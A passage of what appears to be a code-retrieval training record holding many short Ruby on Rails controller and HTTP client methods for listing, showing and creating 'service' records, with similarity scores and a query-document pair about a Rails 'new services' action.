"def show\n @complex_service = ComplexService.find(params[:id])\n\t\n respond_to do |format|\n format.html # show.html.erb\n format.xml { render :xml => @complex_service }\n end\n end",
"def services\n end",
"def api_xml(path,method=:get,options={})\n xml_message(amee,\"/data\"+path,method,options)\n end",
"def show\n @service_line = ServiceLine.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.xml { render :xml => @service_line }\n end\n end",
"def show\n @service = Service.find(params[:id])\n \n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @service }\n end\n end",
"def service_document\n response = get(@url.to_s)\n response.body\n end",
"def index\n apis = site_account.api_docs_services\n .published\n .with_system_names((params[:services] || \"\").split(\",\"))\n .select{ |api| api.specification.swagger_1_2? }\n\n respond_with({\n swaggerVersion: \"1.2\",\n apis: apis.map!{ |service| swagger_spec_for(service) },\n basePath: \"#{request.protocol}#{request.host}\"\n })\n end",
"def show\n @final_service = FinalService.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.xml { render :xml => @final_service }\n end\n end",
"def services\n\tend",
"def new\n @page_id = \"services\"\n @service = Service.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.xml { render :xml => @service }\n end\n end",
"def show\n @service = Service.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @service }\n end\n end",
"def show\n @service = Service.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @service }\n end\n end",
"def show\n @service = Service.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @service }\n end\n end",
"def index\n @services = @page.services.all\n \n respond_to do |format|\n format.html # index.html.erb\n format.json { render json: @services }\n end\n end",
"def read(id=nil)\r\n request = Net::HTTP.new(@uri.host, @uri.port)\r\n if id.nil?\r\n response = request.get(\"#{@uri.path}.xml\") \r\n else\r\n response = request.get(\"#{@uri.path}/#{id}.xml\") \r\n end\r\n response.body\r\n end",
"def find_service(id)\n self.class.get(\"/services/#{id}.json?apikey=#{apikey}\")\n end",
"def index\n @services = Service.all\n end",
"def index\n @services = Service.all\n end",
"def index\n @services = Service.all\n end",
"def index\n @services = Service.all\n end",
"def index\n @services = Service.all\n end",
"def index\n @services = Service.all\n end",
"def index\n @services = Service.all\n end",
"def index\n @services = Service.all\n end",
"def index\n @services = Service.all\n end",
"def servicio # :doc\n id = params[:service_id]\n if id.present?\n \t\tService.find(params[:service_id]) \n \tend \n end",
"def services\n\t\tService.find(:all)\n\tend",
"def index\n @per_page_options = %w{ 21 51 99 }\n respond_to do |format|\n format.html # index.html.erb\n format.xml # index.xml.builder\n format.atom # index.atom.builder\n format.json { render :json => ServiceCatalographer::Api::Json.index(\"services\", json_api_params, @services).to_json }\n format.bljson { render :json => ServiceCatalographer::Api::Bljson.index(\"services\", @services).to_json }\n end\n end",
"def new\n @service = Service.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.xml\n end\n end",
"def index\n @request_services = RequestService.all\n end",
"def index\n @xservices = Xservice.all\n end",
"def index\n delocalize_dates([:from_fecha_hora_greater_than_or_equal_to, :from_fecha_hora_less_than_or_equal_to]) if params[:search]\n @services = do_index(Service, params)\n\n respond_to do |format|\n format.html # index.html.erb\n format.xml { render :xml => @services }\n end\n end",
"def get_xml\n response = @api.request(:get, @location, type: 'xml')\n response.body if response.status == 200\n end",
"def servers(service_id)\n request :get, \"/services/#{service_id}/servers\"\n end",
"def service_uri\n \"#{host}#{service_path}\"\n end",
"def xml(id)\n http.get(\"/nfse/#{id}/xml\") do |response|\n response.headers.fetch(\"Location\") { \"\" }\n end\n end",
"def new\n @service = Service.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.xml { render :xml => @service }\n end\n end",
"def new\n @service = Service.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.xml { render :xml => @service }\n end\n end",
"def index\n @services = Service.find_all_by_user_id(current_user.account_id)\n\n respond_to do |format|\n format.html # index.html.haml\n format.json { render json: @services }\n end\n end",
"def get_service(nickname = nil)\n nickname ||= @nickname\n agent = get_web_agent()\n\n services_uri = ROOT_URI + (\"/%s/services\" % URI.encode(nickname))\n parser = agent.get(services_uri).parser\n\n active_servicelist = parser.xpath(\"//*[@class='active']//ul[@class='servicelist']\")\n\n if !active_servicelist.empty?\n services = active_servicelist.xpath(\"./li/a\").map { |a|\n {\n 'service' => a['class'].split.find { |a_class|\n a_class != 'l_editservice' && a_class != 'service'\n },\n 'serviceid' => a['serviceid'].to_s,\n }\n }\n else\n services = parser.xpath(\"//ul[@class='servicelist']/li/a\").map { |a|\n {\n 'service' => a['class'].split.find { |a_class|\n a_class != 'service'\n },\n 'profileUrl' => (services_uri + a['href'].to_s).to_s,\n }\n }\n end\n services\n end",
"def show\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @service }\n end\n end",
"def show\n @bus_service = BusService.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.xml { render :xml => @bus_service }\n end\n end",
"def get_services()\n return get_request(address(\"/OS-KSADM/services\"), token())\n end",
"def show\n @service_center = ServiceCenter.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.xml { render :xml => @service_center }\n end\n end",
"def show\n @latest_version = @service.latest_version\n @latest_version_instance = @latest_version.service_versionified\n @latest_deployment = @service.latest_deployment\n\n @all_service_version_instances = @service.service_version_instances\n @all_service_types = @service.service_types\n\n @soaplab_server = @service.soaplab_server\n\n @pending_responsibility_requests = @service.pending_responsibility_requests\n unless is_api_request?\n @service_tests = @service.service_tests\n @test_script_service_tests = @service.service_tests_by_type(\"TestScript\")\n @url_monitor_service_tests = @service.service_tests_by_type(\"UrlMonitor\")\n end\n if @latest_version_instance.is_a?(RestService)\n @grouped_rest_methods = @latest_version_instance.group_all_rest_methods_from_rest_resources\n end\n\n respond_to do |format|\n format.html # show.html.erb\n format.xml # show.xml.builder\n format.json { render :json => @service.to_json }\n end\n end",
"def read(id=nil)\n request = Net::HTTP.new(@uri.host, @uri.port)\n if id.nil?\n response = request.get(\"#{@uri.path}.xml\")\n else\n response = request.get(\"#{@uri.path}/#{id}.xml\")\n end\n\n response.body\n end",
"def get_calls(service)\n\t\treturn @transport.get_path(\"calls\",service)\n\tend",
"def query_service(service)\n #remove on production/create testing case?\n resp = @client.get_content(service)\n @@logger.debug \"Service succesfully queried\"\n\n return resp\n end",
"def index\n @service = Service.all()\n end",
"def list_services\n @services\n end",
"def show\n @service_subscription = ServiceSubscription.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.xml { render :xml => @service_subscription }\n end\n end",
"def show\n @nossos_servico = NossosServico.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.xml { render :xml => @nossos_servico }\n end\n end",
"def services\n ret = []\n offset = 0\n loop do\n cur = get(\"services?limit=#{PAGINATION_SIZE}&offset=#{offset}\")\n offset += PAGINATION_SIZE\n ret.push *cur.services\n break if offset >= cur.total\n end\n ret\n end",
"def rest_get(uri)\n \n request = Net::HTTP::Get.new uri\n request.add_field(\"Accept\",\"application/xml\")\n auth_admin(request)\n \n Net::HTTP.start(uri.host, uri.port) do |http|\n response = http.request request\n response.value\n\n doc = REXML::Document.new response.body\n \n return doc\n \n end\n \nend",
"def services\n services = @saloon.services\n\n render_success(data: services, each_serializer: ServiceSerializer)\n end",
"def list_services(client, args, options)\n response = client.get(RESOURCE_PATH)\n\n if CloudClient::is_error?(response)\n [response.code.to_i, response.to_s]\n else\n #[0,response.body]\n if options[:json]\n [0,response.body]\n else\n array_list = JSON.parse(response.body)\n SERVICE_TABLE.show(array_list['DOCUMENT_POOL']['DOCUMENT'])\n 0\n end\n end\nend",
"def service; services.first; end",
"def show\n @service_report = ServiceReport.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.xml { render :xml => @service_report }\n end\n end",
"def index\n @services = Service.where search_params\n respond_with @services if stale? @services\n end",
"def get_version\n response = self.class.get(\"/service/#{$service_id}/version/#{$service_version}\", {\n headers: {\"Fastly-Key\" => $key}\n })\n end",
"def index\n @service_plans = ServicePlan.all\n\n respond_to do |format|\n format.html # index.html.erb\n format.xml { render :xml => @service_plans }\n end\n end",
"def show\n @service = current_user.pro.services.find(params[:id])#Service.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @service }\n end\n end",
"def index\n @service_requests = ServiceRequest.all\n end",
"def loadservices\n yml = YAML::load(File.open('services.yml'))\n yml.each do |el| \n puts \"grabbing info for #{el[1]['name']}\"\n yml = infoFor(el[1]['regex'])\n logyml(el[1]['name'], yml)\n\n puts \"sending info for #{el[1]['name']}\"\n sendreport(el[1]['name'])\n end\n end",
"def index\n respond_to do |format|\n format.html { render_template } # index.html.erb\n format.xml { render xml: @vip_programmer_service }\n end\n end",
"def show\n @service_length = ServiceLength.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.xml { render :xml => @service_length }\n end\n end",
"def show\n @services_charger = ServicesCharger.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.xml { render :xml => @services_charger }\n end\n end",
"def get_services(nickname = nil)\n nickname ||= @nickname\n agent = get_login_agent()\n\n services_uri = ROOT_URI + (\"/%s/services\" % URI.encode(nickname))\n parser = agent.get(services_uri).parser\n\n active_servicelist = parser.xpath(\"//*[@class='active']//ul[@class='servicelist']\")\n\n if !active_servicelist.empty?\n services = active_servicelist.xpath(\"./li/a\").map { |a|\n {\n 'service' => a['class'].split.find { |a_class|\n a_class != 'l_editservice' && a_class != 'service'\n },\n 'serviceid' => a['serviceid'].to_s,\n }\n }\n profile_uri = ROOT_URI + (\"/%s\" % URI.encode(nickname))\n agent.get(profile_uri).parser.xpath(\"//div[@class='servicespreview']/a\").each_with_index { |a, i|\n href = (profile_uri + a['href'].to_s).to_s\n break if profile_uri.route_to(href).relative?\n services[i]['profileUrl'] = href\n }\n else\n services = parser.xpath(\"//ul[@class='servicelist']/li/a\").map { |a|\n {\n 'service' => a['class'].split.find { |a_class|\n a_class != 'service'\n },\n 'profileUrl' => (services_uri + a['href'].to_s).to_s,\n }\n }\n end\n services\n end",
"def show\n @service_check_detail = ServiceCheckDetail.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.xml { render :xml => @service_check_detail }\n end\n end",
"def list_vs_services(options)\n options['method'] = \"vs\"\n dir_list = get_dir_item_list(options)\n message = \"vSphere Services:\"\n handle_output(options,message)\n dir_list.each do |service|\n handle_output(options,service)\n end\n handle_output(options,\"\")\n return\nend",
"def service_directory_name\n \"rest\"\n end",
"def index\n @event_services = EventService.all.where(event_id: params[:event_id])\n @event = Event.find(params[:event_id])\n end",
"def service\n @service ||= fetcher.get(Service, service_id)\n end",
"def index\n services = accessible_services.includes(:proxy, :account).order(:id).paginate(pagination_params)\n respond_with(services)\n end",
"def index\n services = accessible_services.includes(:proxy, :account).order(:id).paginate(pagination_params)\n respond_with(services)\n end",
"def server(service_id, server_id)\n request :get, \"/services/#{service_id}/servers/#{server_id}\"\n end",
"def show\n @service = Service.find(params[:id])\n build_service_content\n \n respond_to do |format|\n format.html # show.html.erb\n end\n end"
] |
[
"0.723194",
"0.721514",
"0.6730267",
"0.67126286",
"0.6581411",
"0.6567619",
"0.6438637",
"0.64325076",
"0.6306425",
"0.6260527",
"0.6197347",
"0.61746657",
"0.61644286",
"0.6164009",
"0.6106485",
"0.6106036",
"0.6087944",
"0.6068472",
"0.6034685",
"0.6034039",
"0.6010789",
"0.6010059",
"0.60043037",
"0.5995787",
"0.5987187",
"0.5952009",
"0.5949028",
"0.5948134",
"0.5936072",
"0.59283507",
"0.58992505",
"0.589549",
"0.588833",
"0.5878129",
"0.5866787",
"0.5866787",
"0.5866787",
"0.5855112",
"0.58549476",
"0.5852191",
"0.5845065",
"0.5845065",
"0.5845065",
"0.5845065",
"0.5845065",
"0.5845065",
"0.5845065",
"0.5845065",
"0.5845065",
"0.5845052",
"0.5841864",
"0.5837094",
"0.58269614",
"0.5819927",
"0.5812021",
"0.58100945",
"0.5801358",
"0.57954246",
"0.5793321",
"0.5789879",
"0.57773215",
"0.57773215",
"0.57753515",
"0.576456",
"0.5762838",
"0.5742345",
"0.5739349",
"0.5730752",
"0.5700076",
"0.569775",
"0.5691283",
"0.56863797",
"0.5683742",
"0.56734884",
"0.5664377",
"0.56614786",
"0.5661294",
"0.5660054",
"0.56557053",
"0.5653236",
"0.5644369",
"0.5643727",
"0.56318665",
"0.56306833",
"0.56276864",
"0.5618131",
"0.560659",
"0.5591246",
"0.5574793",
"0.5550121",
"0.554836",
"0.5547349",
"0.5545144",
"0.5542527",
"0.55419123",
"0.5537499",
"0.55300516",
"0.55297345",
"0.55297345",
"0.55260444",
"0.5519346"
] |
0.0
|
-1
|
select host or app
|
def select
@type = params[:type]
@hosts = Host.all :select => "id, name" , :conditions => { :tenant_id => current_user.tenant_id } if @type == "host"
@apps = App.all :select => "id, name" , :conditions => { :tenant_id => current_user.tenant_id } if @type == "app"
@sites = Site.all :select => "id, name" , :conditions => { :tenant_id => current_user.tenant_id } if @type == "site"
@devices = Device.all :select => "id, name" , :conditions => { :tenant_id => current_user.tenant_id } if @type == "device"
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def if_app(app, req)\n app == :dashboard ? (req + '.http.host ~ \"(dashboard|studio)\"') : nil\nend",
"def dev_host\n case Socket.gethostname\n when /romeo-foxtrot/i ; true\n else ; false\n end\nend",
"def app_host\n @data[\"app_host\"]\n end",
"def selected_host\n\t\tselhost = Target.find(:first, :conditions => [\"selected > 0\"] )\n\t\tif selhost\n\t\t\treturn selhost.host\n\t\telse\n\t\t\treturn\n\t\tend\t\n\tend",
"def default_host\n host_list.first\n end",
"def selected_host\n\t\tselhost = WmapTarget.find(:first, :conditions => [\"selected != 0\"] )\n\t\tif selhost\n\t\t\treturn selhost.host\n\t\telse\n\t\t\treturn\n\t\tend\n\tend",
"def get_host(host)\n\t\t\tif host == 'gateway'\n\t\t\t\tif @prod_env\n\t\t\t\t\t@gateway_prod\n\t\t\t\telse\n\t\t\t\t\t@gateway_dev\n\t\t\t\tend\n\t\t\telsif host == 'panel'\n\t\t\t\tif @prod_env\n\t\t\t\t\t@panel_prod\n\t\t\t\telse\n\t\t\t\t\t@panel_dev\n\t\t\t\tend\n\t\t\telsif host == 'minhaconta'\n\t\t\t\tif @prod_env\n\t\t\t\t\t@minhaconta_prod\n\t\t\t\telse\n\t\t\t\t\t@minhaconta_dev\n\t\t\t\tend\n\t\t\tend\n\t\tend",
"def host_is_app_host?(hostname)\n hostname == \"adapt.127.0.0.1.xip.io\"\n end",
"def default_host\n primary_host = hosts.primary.first\n primary_host.blank? ? \"#{subdomain}.adaptapp.com\" : primary_host.hostname\n end",
"def host\n @options[:host]\n end",
"def choseScheme()\n \tscheme = UI.select(\"Select scheme:\", [\"CIASMovie\", \"ZhongDuMovie\", \"BaoShan\", \"HuaChenMovie\", \"HengDian\"])\n\n\tENV[\"SCHEME\"] = scheme\n\tENV[\"APP_ID\"] = ENV[\"APP_ID_#{scheme}\"]\n\n end",
"def with_primary_app_server(&block)\n with_env('HOSTS',primary_app_server.to_s) { yield }\n end",
"def main_site_host\n case Rails.env\n when 'development'\n # '192.168.1.140' # to test in ie\n # 'ngoaidmap.dev'\n 'iom.dev'\n when 'test'\n 'example.com'\n when 'staging'\n Settings.main_site_host\n when 'production'\n Settings.main_site_host\n end\n end",
"def os\n @host\n end",
"def host\n @host || HOST_PRODUCTION\n end",
"def app(name=nil)\n if @app.nil? && name.nil? && Remotely.apps.size == 1\n name = Remotely.apps.first.first\n end\n\n (name and @app = name) or @app\n end",
"def concierge_host\n context[:host]\n end",
"def app?\n app_host = Radiant.config['app.host']\n match = unless app_host.blank?\n request.host == app_host\n else\n request.host =~ /^app\\./\n end\n !!match\n end",
"def primary_app_server\n @primary_app_server ||= find_servers(:roles => :app, :only => {:primary => true}).first || find_servers(:roles => :app).first\n end",
"def hostname\n @options[:host][:name] if @options[:host]\n end",
"def index\n cloud = shift_argument\n validate_arguments!\n\n if cloud\n action(\"Switching to #{cloud} cloud\") do\n heroku_host = case cloud\n when \"standard\" then \"heroku.com\"\n when \"shadow\" then \"heroku-shadow.com\"\n else \"#{cloud}.herokudev.com\"\n end\n Heroku::Auth.write_heroku_host heroku_host\n end\n else\n puts case Heroku::Auth.host\n when \"heroku.com\" then \"standard\"\n when \"heroku-shadow.com\" then \"shadow\"\n when /^(\\w+).herokudev.com/ then $1\n end\n end\n end",
"def default_app()\n @apps[0]\n end",
"def app\n @options[:app]\n end",
"def host; end",
"def host; end",
"def host; end",
"def host; end",
"def host; end",
"def host; end",
"def host; end",
"def host; end",
"def host; end",
"def select_app file_name \n\t\tftype = file_type( file_name ).downcase\n\t\t@app_map[ ftype ]\n\tend",
"def get_host\n roles(:web).server host\n end",
"def target_host\n\t\tif(self.respond_to?('rhost'))\n\t\t\treturn rhost()\n\t\tend\n\n\t\tif(self.datastore['RHOST'])\n\t\t\treturn self.datastore['RHOST']\n\t\tend\n\n\t\tnil\n\tend",
"def host_id; 'localhost' end",
"def host\n conf['dashboard']['host']\n end",
"def first_db_host\n @db_host ||= find_servers(:roles => :db).map(&:to_s).first\nend",
"def host\n @host = self.hostuser\n end",
"def choose_layout\n logger.info \"\\n HOST #{request.host}\\n\"\n if current_user.present?\n if current_user.role?(:admin)\n 'backend_admin'\n else\n 'backend'\n end\n else\n 'application'\n end\n end",
"def has_required_host?\n true\n end",
"def desired_hostname\n if path.start_with?('/foo/en')\n Rails.env.staging? ? 'foo-staging.infopark.com' : 'www.foo.com'\n else\n # Default hostname\n Rails.env.staging? ? 'website-staging.infopark.com' : 'www.website.com'\n end\n end",
"def host; config[:host]; end",
"def host=(_); end",
"def host\n active_backend.host\n end",
"def hostname\n Rails.env.development? ? 'http://localhost:3000' : 'http://coderalert.com'\n end",
"def host=(_arg0); end",
"def host=(_arg0); end",
"def default_server\n server?(:default)\n end",
"def host\n @host\n end",
"def select_app file_name\n ftype = file_type file_name\n @app_map[ftype]\n end",
"def host(value = nil)\n if value\n @host = value\n else\n @host ||= 'localhost'\n end\n end",
"def host\n @host ||= target.split(':',2).first\n end",
"def host\n \"#{request.env['rack.url_scheme']}://#{request.host}:#{request.port}\".sub(':80','')# rescue 'http://locahost:3000'\n end",
"def host\n @host\n end",
"def host\n @host\n end",
"def is?(match)\n match === RbConfig::CONFIG[\"host_os\"]\n end",
"def web_server\n if %{apache apache2}.include? node[:webapp][:web_server]\n \"apache2\"\n else\n \"nginx\"\n end\nend",
"def select_test_app\n # get environment\n env = $config['modules']['ui']['apps']['imedidata']['base_url']\n\n if env.include? \"sandbox\"\n test_app_sb.find('input').set(true)\n elsif env.include? \"validation\"\n test_app.find('input').set(true)\n end\n end",
"def hostname\n options[:hostname]\n end",
"def host\n @host || Sapience.config.host\n end",
"def host\n self.host\n end",
"def select_app file_name \n ftype = file_type( file_name ).downcase\n @app_map[ ftype ]\n end",
"def select_app file_name\n ftype = file_type( file_name ).downcase\n @app_map[ ftype ]\n end",
"def discover_current_site\n site_from_host\n end",
"def my_os\n if ENV['LAUNCHY_HOST_OS'] then\n Launchy.log \"#{self.name} : Using LAUNCHY_HOST_OS override of '#{ENV['LAUNCHY_HOST_OS']}'\"\n return ENV['LAUNCHY_HOST_OS']\n else\n ::Config::CONFIG['host_os']\n end\n end",
"def host?\n self.host\n end",
"def host\r\n return for_context(nil, false) { |c| c.host }\r\n end",
"def get_host\n @host\n end",
"def __default_network_host\n case version\n when /^0|^1/\n '0.0.0.0'\n when /^2/\n '_local_'\n when /^5|^6|^7/\n '_local_'\n else\n raise RuntimeError, \"Cannot determine default network host from version [#{version}]\"\n end\n end",
"def get_host(host_id = self.current_host_id)\n if host_id\n self.is_guest_of_what.find {|host| host.id == host_id}\n else\n self.is_guest_of_what.first\n end\n end",
"def current_host\n @current_host ||= \"#{request.protocol}#{request.host_with_port}\"\n end",
"def set_host(v)\n v = \"\" if v.nil? || v == \"localhost\"\n @host = v\n end",
"def host\n # find host in opts first\n host = options[:host] || @configuration['host']\n host = 'http://api.unipept.ugent.be' if host.nil? || host.empty?\n\n # add http:// if needed\n if host.start_with?('http://', 'https://')\n host\n else\n \"http://#{host}\"\n end\n end",
"def host(h = nil)\n if h\n @host = h\n else\n @host\n end\n end",
"def get_host(opts)\n if opts.kind_of? ::Mdm::Host\n return opts\n elsif opts.kind_of? String\n raise RuntimeError, \"This invocation of get_host is no longer supported: #{caller}\"\n else\n address = opts[:addr] || opts[:address] || opts[:host] || return\n return address if address.kind_of? ::Mdm::Host\n end\n ::ApplicationRecord.connection_pool.with_connection {\n wspace = Msf::Util::DBManager.process_opts_workspace(opts, framework)\n\n address = Msf::Util::Host.normalize_host(address)\n return wspace.hosts.find_by_address(address)\n }\n end",
"def host_os; end",
"def host_os; end",
"def site_from_host\n Site.find_for_host(request.host)\n end",
"def get_target(host)\n case host\n when 'server'\n node = $server\n when 'ceos-minion'\n node = $ceos_minion\n when 'ssh-minion'\n node = $ssh_minion\n when 'sle-minion'\n node = $minion\n when 'sle-client'\n node = $client\n when 'sle-migrated-minion'\n node = $client\n else\n raise 'Invalid target.'\n end\n node\nend",
"def get_target(host)\n case host\n when 'server'\n node = $server\n when 'ceos-minion'\n node = $ceos_minion\n when 'ssh-minion'\n node = $ssh_minion\n when 'sle-minion'\n node = $minion\n when 'sle-client'\n node = $client\n when 'sle-migrated-minion'\n node = $client\n else\n raise 'Invalid target.'\n end\n node\nend",
"def select(what, for_what=nil)\n for_what ? select_app(what[:app], for_what) : select_item(what)\n end",
"def set_device\n # if HTTP_USER_AGENT is blank/nil defaults to blank, i.e. desktop \n agent = request.env[\"HTTP_USER_AGENT\"].blank? ? \"\" : request.env[\"HTTP_USER_AGENT\"].downcase \n if agent =~ tablet_agents\n \"tablet\"\n elsif (agent =~ mobile_agents_one) || (agent[0..3] =~ mobile_agents_two)\n \"mobile\"\n else\n \"desktop\"\n end \n end",
"def db_host(app_id, database_id)\n all_addons = heroku_client.addon.list_by_app(app_id)\n database_json = all_addons.find do |addon|\n [addon['id'], addon['addon_service']['id']].include?(database_id)\n end\n return STARTER_HOST if database_json.nil?\n\n host_for(database_json)\n end",
"def needs_host_list?\n vima? || okeanos?\n end",
"def host\n ENV['CA_HOST'] || DEFAULT_HOST\n end",
"def select_a_server(name, url)\n # no url, no name, try to use current master\n if url.nil? && name.nil?\n if config.current_master\n return config.current_master\n else\n exit_with_error 'URL not specified and current master not selected'\n end\n end\n\n if name && url\n exact_match = config.find_server_by(url: url, name: name)\n return exact_match if exact_match # found an exact match, going to use that one.\n\n name_match = config.find_server(name)\n\n if name_match\n #found a server with the provided name, set the provided url to it and return\n name_match.url = url\n return name_match\n else\n # nothing found, create new.\n return Kontena::Cli::Config::Server.new(name: name, url: url)\n end\n elsif name\n # only --name provided, try to find a server with that name\n name_match = config.find_server(name)\n\n if name_match && name_match.url\n return name_match\n else\n exit_with_error \"Master #{name} was found from config, but it does not have an URL and no URL was provided on command line\"\n end\n elsif url\n # only url provided\n if url =~ /^https?:\\/\\//\n # url is actually an url\n url_match = config.find_server_by(url: url)\n if url_match\n return url_match\n else\n return Kontena::Cli::Config::Server.new(url: url, name: nil)\n end\n else\n name_match = config.find_server(url)\n if name_match\n unless name_match.url\n exit_with_error \"Master #{url} was found from config, but it does not have an URL and no URL was provided on command line\"\n end\n return name_match\n else\n exit_with_error \"Can't find a master with name #{name} from configuration\"\n end\n end\n end\n end",
"def current_application(request)\n app_selector.call(request, applications)\n end",
"def host_os\n name = `uname`.split(' ').first.downcase.to_sym\n case name\n when :linux\n :linux\n when :darwin\n :macosx\n else\n :unknown\n end\n end",
"def deduce_tenant_host\n if request.host.downcase.start_with?('www.')\n request.host[4..-1]\n else\n request.host\n end\n end",
"def host\n @host ||= Chimps.config[:catalog][:host]\n end",
"def on_db_host(host)\n\tend",
"def host\n Socket.gethostname\n end",
"def host\n Socket.gethostname\n end",
"def server_selector\n @server_selector ||= ServerSelector.get(read_preference || database.server_selector)\n end",
"def server_software\r\n(@env['SERVER_SOFTWARE'] && /^([a-zA-Z]+)/ =~ @env['SERVER_SOFTWARE']) ? $1.downcase : nil\r\nend",
"def host\n @host ||= Babushka::SystemProfile.for_host\n end",
"def pull_request_host\n\t\tpull_request_where == 'jackrabbit' ? ALF_CFG['host'] : ALF_CFG[\"cedar_host\"]\n\tend",
"def host_or_domain\n return @host_or_domain\n end",
"def get_os\n if RbConfig::CONFIG['host_os'] =~ /mswin|mingw|cygwin/\n return :Windows\n elsif RbConfig::CONFIG['host_os'] =~ /darwin/\n return :Mac\n elsif RbConfig::CONFIG['host_os'] =~ /linux/\n return :Linux\n elsif RbConfig::CONFIG['host_os'] =~ /bsd/\n return :BSD\n else\n return :unknown_os\n end\nend"
] |
[
"0.6547287",
"0.6383476",
"0.62955004",
"0.6291793",
"0.62753516",
"0.61840636",
"0.6124936",
"0.6103736",
"0.6068235",
"0.6048353",
"0.59888935",
"0.5938477",
"0.5929573",
"0.59189403",
"0.59010845",
"0.5884807",
"0.5877257",
"0.58755",
"0.58680695",
"0.5856544",
"0.58012766",
"0.57259595",
"0.57151127",
"0.5707881",
"0.5707881",
"0.5707881",
"0.5707881",
"0.5707881",
"0.5707881",
"0.5707881",
"0.5707881",
"0.5707881",
"0.5694412",
"0.5681001",
"0.56762993",
"0.56631225",
"0.56455326",
"0.56332016",
"0.56329775",
"0.563046",
"0.5624937",
"0.56246907",
"0.56220967",
"0.56062484",
"0.55974865",
"0.55863357",
"0.55779195",
"0.55779195",
"0.5566201",
"0.5565247",
"0.55643123",
"0.5561317",
"0.5560829",
"0.5555412",
"0.5553077",
"0.5553077",
"0.5548454",
"0.5539486",
"0.553576",
"0.5530247",
"0.55288005",
"0.5518386",
"0.55079824",
"0.5492042",
"0.549183",
"0.5482735",
"0.54763126",
"0.54709923",
"0.54621476",
"0.54613465",
"0.54553926",
"0.5448722",
"0.54271376",
"0.54140204",
"0.5395088",
"0.53945786",
"0.5393293",
"0.5393293",
"0.53912354",
"0.53909475",
"0.53909475",
"0.5383584",
"0.5379228",
"0.53767204",
"0.53753865",
"0.537511",
"0.5371236",
"0.53640205",
"0.53558904",
"0.53491086",
"0.5347576",
"0.53408575",
"0.5338028",
"0.53370243",
"0.53294665",
"0.5329006",
"0.53250504",
"0.5322142",
"0.53160566",
"0.53076065"
] |
0.54177153
|
73
|
GET /services/new GET /services/new.xml
|
def new
submenu_item 'services-new'
@service = Service.new(:type_id => params[:type_id], :check_interval => 300)
@service_type = @service.type
service_param
unless @service_type
if @app
redirect_to types_app_services_path(@app)
elsif @site
redirect_to types_site_services_path(@site)
elsif @host
redirect_to types_host_services_path(@host)
elsif @device
redirect_to types_device_services_path(@device)
else
redirect_to params.update(:action => "select")
end
return
end
dictionary
s = @serviceable
@service.agent_id = @host.agent_id if @host
@service.serviceable_id = s && s.id
@service.name = @service_type.default_name
@service.ctrl_state = @service_type.ctrl_state
@service.threshold_critical = @service_type.threshold_critical
@service.threshold_warning = @service_type.threshold_warning
@service.check_interval = @default_check_interval
respond_to do |format|
format.html
format.xml { render :xml => @service }
end
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def new\n @page_id = \"services\"\n @service = Service.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.xml { render :xml => @service }\n end\n end",
"def new\n @service = Service.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.xml\n end\n end",
"def new\n @service = Service.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.xml { render :xml => @service }\n end\n end",
"def new\n @service = Service.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.xml { render :xml => @service }\n end\n end",
"def new\n @service_version = ServiceVersion.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.xml { render :xml => @service_version }\n end\n end",
"def new\n @final_service = FinalService.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.xml { render :xml => @final_service }\n end\n end",
"def new\n respond_to do |format|\n format.html # new.html.erb\n format.xml { render :xml => new_vurl }\n end\n end",
"def new\n @service = Service.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @service }\n end\n end",
"def new\n @service = Service.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @service }\n end\n end",
"def new\n @service = Service.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @service }\n end\n end",
"def new\n @service = Service.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @service }\n end\n end",
"def new\n @nossos_servico = NossosServico.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.xml { render :xml => @nossos_servico }\n end\n end",
"def new\n @service = Service.new\n\n respond_to do |format|\n format.html # new.html.erb\n end\n end",
"def new\n @complex_service = ComplexService.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.xml { render :xml => @complex_service }\n end\n end",
"def create\n\n @service = Service.new(params[:service])\n respond_to do |format|\n if @service.save\n\n format.html { }\n format.xml { render :xml => @service }\n else\n format.html { render :action => \"new\" }\n format.xml { render :xml => @service }\n end\n end\n end",
"def new\n respond_to do |format|\n format.html { render_template } # new.html.erb\n format.xml { render xml: @vip_programmer_service }\n end\n end",
"def new\n @tservicio = Tservicio.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.xml { render :xml => @tservicio }\n end\n end",
"def new\n @network = Network.new\n @service = Fileservice.new(@network)\n \n respond_to do |format|\n format.html # new.html.erb\n format.xml { render :xml => @network }\n end\n end",
